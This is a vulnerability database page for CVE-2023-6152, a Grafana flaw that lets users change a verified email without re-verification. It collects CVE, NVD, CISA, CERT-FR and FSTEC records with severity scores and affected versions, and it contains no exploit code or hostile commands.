CVE-2023-6152 (GCVE-0-2023-6152)
Vulnerability from cvelistv5 – Published: 2024-02-13 21:38 – Updated: 2025-02-15 00:10
VLAI?
Summary
A user changing their email after signing up and verifying it can change it without verification in profile settings.
The configuration option "verify_email_enabled" will only validate email only on sign up.
Severity ?
5.4 (Medium)
CWE
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Grafana | Grafana |
Affected:
2.5.0 , < 9.5.16
(semver)
Affected: 10.0.0 , < 10.0.11 (semver) Affected: 10.1.0 , < 10.1.7 (semver) Affected: 10.2.0 , < 10.2.4 (semver) Affected: 10.3.0 , < 10.3.3 (semver) |
|
| Grafana | Grafana Enterprise |
Affected:
2.5.0 , < 9.5.16
(semver)
Affected: 10.0.0 , < 10.0.11 (semver) Affected: 10.1.0 , < 10.1.7 (semver) Affected: 10.2.0 , < 10.2.4 (semver) Affected: 10.3.0 , < 10.3.3 (semver) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-02-15T00:10:28.890Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250214-0008/"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "grafana",
"vendor": "grafana",
"versions": [
{
"lessThan": "9.5.16",
"status": "affected",
"version": "2.5.0",
"versionType": "custom"
},
{
"lessThan": "10.0.11",
"status": "affected",
"version": "10.0.0",
"versionType": "custom"
},
{
"lessThan": "10.1.7",
"status": "affected",
"version": "10.10",
"versionType": "custom"
},
{
"lessThan": "10.2.4",
"status": "affected",
"version": "10.2.0",
"versionType": "custom"
},
{
"lessThan": "10.3.3",
"status": "affected",
"version": "10.3.0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:grafana:grafana_enterprise:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "grafana_enterprise",
"vendor": "grafana",
"versions": [
{
"lessThan": "9.5.16",
"status": "affected",
"version": "2.5.0",
"versionType": "custom"
},
{
"lessThan": "10.0.11",
"status": "affected",
"version": "10.0.0",
"versionType": "custom"
},
{
"lessThan": "10.1.7",
"status": "affected",
"version": "10.10",
"versionType": "custom"
},
{
"lessThan": "10.2.4",
"status": "affected",
"version": "10.2.0",
"versionType": "custom"
},
{
"lessThan": "10.3.3",
"status": "affected",
"version": "10.3.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6152",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-22T15:42:45.786092Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-22T15:51:56.870Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Grafana",
"vendor": "Grafana",
"versions": [
{
"lessThan": "9.5.16",
"status": "affected",
"version": "2.5.0",
"versionType": "semver"
},
{
"lessThan": "10.0.11",
"status": "affected",
"version": "10.0.0",
"versionType": "semver"
},
{
"lessThan": "10.1.7",
"status": "affected",
"version": "10.1.0",
"versionType": "semver"
},
{
"lessThan": "10.2.4",
"status": "affected",
"version": "10.2.0",
"versionType": "semver"
},
{
"lessThan": "10.3.3",
"status": "affected",
"version": "10.3.0",
"versionType": "semver"
}
]
},
{
"product": "Grafana Enterprise",
"vendor": "Grafana",
"versions": [
{
"lessThan": "9.5.16",
"status": "affected",
"version": "2.5.0",
"versionType": "semver"
},
{
"lessThan": "10.0.11",
"status": "affected",
"version": "10.0.0",
"versionType": "semver"
},
{
"lessThan": "10.1.7",
"status": "affected",
"version": "10.1.0",
"versionType": "semver"
},
{
"lessThan": "10.2.4",
"status": "affected",
"version": "10.2.0",
"versionType": "semver"
},
{
"lessThan": "10.3.3",
"status": "affected",
"version": "10.3.0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eA user changing their email after signing up and verifying it can change it without verification in profile settings.\u003c/p\u003e\u003cp\u003eThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\u003c/p\u003e"
}
],
"value": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n"
}
],
"impacts": [
{
"capecId": "CAPEC-115",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-115"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-02-13T21:38:01.404Z",
"orgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"shortName": "GRAFANA"
},
"references": [
{
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"assignerShortName": "GRAFANA",
"cveId": "CVE-2023-6152",
"datePublished": "2024-02-13T21:38:01.404Z",
"dateReserved": "2023-11-15T12:44:28.824Z",
"dateUpdated": "2025-02-15T00:10:28.890Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2023-6152",
"date": "2026-05-19",
"epss": "0.00219",
"percentile": "0.44425"
},
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"2.5.0\", \"matchCriteriaId\": \"F1B0912A-B5CC-42BE-93D4-0A501A0245FA\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:grafana:grafana:10.0.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"CB81DBAE-551A-41FD-BFB5-325C9E0BCA10\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:grafana:grafana:10.1.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"1A61A884-885C-4961-8263-682CC9EDBCE8\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:grafana:grafana:10.2.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"EE8E4C18-557B-4CD0-9EE5-DC4B8D5F20BC\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:grafana:grafana:10.3.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"9F6206EA-DB68-4409-A694-74F47D6879D4\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"A user changing their email after signing up and verifying it can change it without verification in profile settings.\\n\\nThe configuration option \\\"verify_email_enabled\\\" will only validate email only on sign up.\\n\\n\"}, {\"lang\": \"es\", \"value\": \"Un usuario que cambia su correo electr\\u00f3nico despu\\u00e9s de registrarse y verificarlo puede cambiarlo sin verificaci\\u00f3n en la configuraci\\u00f3n del perfil. La opci\\u00f3n de configuraci\\u00f3n \\\"verify_email_enabled\\\" solo validar\\u00e1 el correo electr\\u00f3nico al registrarse.\"}]",
"id": "CVE-2023-6152",
"lastModified": "2024-11-21T08:43:15.483",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security@grafana.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\", \"baseScore\": 5.4, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"LOW\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 2.5}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\", \"baseScore\": 5.4, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"LOW\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 2.5}]}",
"published": "2024-02-13T22:15:45.430",
"references": "[{\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\", \"source\": \"security@grafana.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://grafana.com/security/security-advisories/cve-2023-6152/\", \"source\": \"security@grafana.com\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://grafana.com/security/security-advisories/cve-2023-6152/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}]",
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Modified",
"weaknesses": "[{\"source\": \"security@grafana.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-863\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-863\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2023-6152\",\"sourceIdentifier\":\"security@grafana.com\",\"published\":\"2024-02-13T22:15:45.430\",\"lastModified\":\"2025-02-15T01:15:09.723\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A user changing their email after signing up and verifying it can change it without verification in profile settings.\\n\\nThe configuration option \\\"verify_email_enabled\\\" will only validate email only on sign up.\\n\\n\"},{\"lang\":\"es\",\"value\":\"Un usuario que cambia su correo electr\u00f3nico despu\u00e9s de registrarse y verificarlo puede cambiarlo sin verificaci\u00f3n en la configuraci\u00f3n del perfil. La opci\u00f3n de configuraci\u00f3n \\\"verify_email_enabled\\\" solo validar\u00e1 el correo electr\u00f3nico al registrarse.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security@grafana.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":2.5},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security@grafana.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-863\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-863\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"2.5.0\",\"matchCriteriaId\":\"F1B0912A-B5CC-42BE-93D4-0A501A0245FA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:10.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CB81DBAE-551A-41FD-BFB5-325C9E0BCA10\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:10.1.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1A61A884-885C-4961-8263-682CC9EDBCE8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:10.2.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EE8E4C18-557B-4CD0-9EE5-DC4B8D5F20BC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:10.3.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9F6206EA-DB68-4409-A694-74F47D6879D4\"}]}]}],\"references\":[{\"url\":\"https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\",\"source\":\"security@grafana.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://grafana.com/security/security-advisories/cve-2023-6152/\",\"source\":\"security@grafana.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://grafana.com/security/security-advisories/cve-2023-6152/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20250214-0008/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2023-6152/\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://security.netapp.com/advisory/ntap-20250214-0008/\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2025-02-15T00:10:28.890Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-6152\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-22T15:42:45.786092Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\"], \"vendor\": \"grafana\", \"product\": \"grafana\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.5.0\", \"lessThan\": \"9.5.16\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"10.0.11\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.10\", \"lessThan\": \"10.1.7\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.2.0\", \"lessThan\": \"10.2.4\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.3.0\", \"lessThan\": \"10.3.3\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}, {\"cpes\": [\"cpe:2.3:a:grafana:grafana_enterprise:*:*:*:*:*:*:*:*\"], \"vendor\": \"grafana\", \"product\": \"grafana_enterprise\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.5.0\", \"lessThan\": \"9.5.16\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"10.0.11\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.10\", \"lessThan\": \"10.1.7\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.2.0\", \"lessThan\": \"10.2.4\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"10.3.0\", \"lessThan\": \"10.3.3\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-22T15:47:58.337Z\"}}], \"cna\": {\"impacts\": [{\"capecId\": \"CAPEC-115\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-115\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"Grafana\", \"product\": \"Grafana\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.5.0\", \"lessThan\": \"9.5.16\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"10.0.11\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.1.0\", \"lessThan\": \"10.1.7\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.2.0\", \"lessThan\": \"10.2.4\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.3.0\", \"lessThan\": \"10.3.3\", \"versionType\": \"semver\"}]}, {\"vendor\": \"Grafana\", \"product\": \"Grafana Enterprise\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.5.0\", \"lessThan\": \"9.5.16\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"10.0.11\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.1.0\", \"lessThan\": \"10.1.7\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.2.0\", \"lessThan\": \"10.2.4\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"10.3.0\", \"lessThan\": \"10.3.3\", \"versionType\": \"semver\"}]}], \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2023-6152/\"}, {\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"A user changing their email after signing up and verifying it can change it without verification in profile settings.\\n\\nThe configuration option \\\"verify_email_enabled\\\" will only validate email only on sign up.\\n\\n\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cp\u003eA user changing their email after signing up and verifying it can change it without verification in profile settings.\u003c/p\u003e\u003cp\u003eThe configuration option \\\"verify_email_enabled\\\" will only validate email only on sign up.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-863\", \"description\": \"CWE-863\"}]}], \"providerMetadata\": {\"orgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"shortName\": \"GRAFANA\", \"dateUpdated\": \"2024-02-13T21:38:01.404Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2023-6152\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-15T00:10:28.890Z\", \"dateReserved\": \"2023-11-15T12:44:28.824Z\", \"assignerOrgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"datePublished\": \"2024-02-13T21:38:01.404Z\", \"assignerShortName\": \"GRAFANA\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
CERTFR-2024-AVI-0132
Vulnerability from certfr_avis - Published: - Updated:
Une vulnérabilité a été découverte dans Grafana. Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Grafana Labs | Grafana | Grafana versions antérieures à 9.5.16 | ||
| Grafana Labs | Grafana | Grafana versions 10.3.x antérieures à 10.3.3 | ||
| Grafana Labs | Grafana | Grafana versions 10.2.x antérieures à 10.2.4 | ||
| Grafana Labs | Grafana | Grafana versions 10.0.x antérieures à 10.0.11 | ||
| Grafana Labs | Grafana | Grafana versions 10.1.x antérieures à 10.1.7 |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Grafana versions ant\u00e9rieures \u00e0 9.5.16",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.3.x ant\u00e9rieures \u00e0 10.3.3",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.2.x ant\u00e9rieures \u00e0 10.2.4",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.0.x ant\u00e9rieures \u00e0 10.0.11",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.1.x ant\u00e9rieures \u00e0 10.1.7",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-6152",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6152"
}
],
"links": [],
"reference": "CERTFR-2024-AVI-0132",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-02-15T00:00:00.000000"
}
],
"risks": [
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans Grafana. Elles permettent \u00e0 un\nattaquant de provoquer un contournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Vuln\u00e9rabilit\u00e9 dans Grafana",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Grafana du 14 f\u00e9vrier 2024",
"url": "https://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/"
}
]
}
CERTFR-2024-AVI-0132
Vulnerability from certfr_avis - Published: - Updated:
Une vulnérabilité a été découverte dans Grafana. Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Grafana Labs | Grafana | Grafana versions antérieures à 9.5.16 | ||
| Grafana Labs | Grafana | Grafana versions 10.3.x antérieures à 10.3.3 | ||
| Grafana Labs | Grafana | Grafana versions 10.2.x antérieures à 10.2.4 | ||
| Grafana Labs | Grafana | Grafana versions 10.0.x antérieures à 10.0.11 | ||
| Grafana Labs | Grafana | Grafana versions 10.1.x antérieures à 10.1.7 |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Grafana versions ant\u00e9rieures \u00e0 9.5.16",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.3.x ant\u00e9rieures \u00e0 10.3.3",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.2.x ant\u00e9rieures \u00e0 10.2.4",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.0.x ant\u00e9rieures \u00e0 10.0.11",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
},
{
"description": "Grafana versions 10.1.x ant\u00e9rieures \u00e0 10.1.7",
"product": {
"name": "Grafana",
"vendor": {
"name": "Grafana Labs",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-6152",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6152"
}
],
"links": [],
"reference": "CERTFR-2024-AVI-0132",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-02-15T00:00:00.000000"
}
],
"risks": [
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans Grafana. Elles permettent \u00e0 un\nattaquant de provoquer un contournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Vuln\u00e9rabilit\u00e9 dans Grafana",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Grafana du 14 f\u00e9vrier 2024",
"url": "https://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/"
}
]
}
BDU:2024-02816
Vulnerability from fstec - Published: 10.11.2023
VLAI Severity ?
Title
Уязвимость базовой системы аутентификации веб-инструмента представления данных Grafana, позволяющая нарушителю обойти проверку электронной почты и помешать законным владельцам электронной почты зарегистрироваться
Description
Уязвимость базовой системы аутентификации веб-инструмента представления данных Grafana связана с недостатками механизма авторизации при обработке параметра verify_email_enabled. Эксплуатация уязвимости может позволить нарушителю, действующему удалённо, обойти проверку электронной почты и помешать законным владельцам электронной почты зарегистрироваться
Severity ?
Vendor
ООО «Ред Софт», Grafana Labs
Software Name
РЕД ОС (запись в едином реестре российских программ №3751), Grafana
Software Version
7.3 (РЕД ОС), до 9.5.16 (Grafana), от 10.0.0 до 10.0.11 (Grafana), от 10.1.0 до 10.1.7 (Grafana), от 10.2.0 до 10.2.4 (Grafana), от 10.3.0 до 10.3.3 (Grafana)
Possible Mitigations
Использование рекомендаций:
Для Grafana:
https://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/
Для РедОС: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/
Reference
https://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/
https://grafana.com/security/security-advisories/cve-2023-6152/
https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f
http://repo.red-soft.ru/redos/7.3c/x86_64/updates/
CWE
CWE-863
{
"CVSS 2.0": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"CVSS 3.0": "AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"CVSS 4.0": null,
"remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
"remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
"\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb, Grafana Labs",
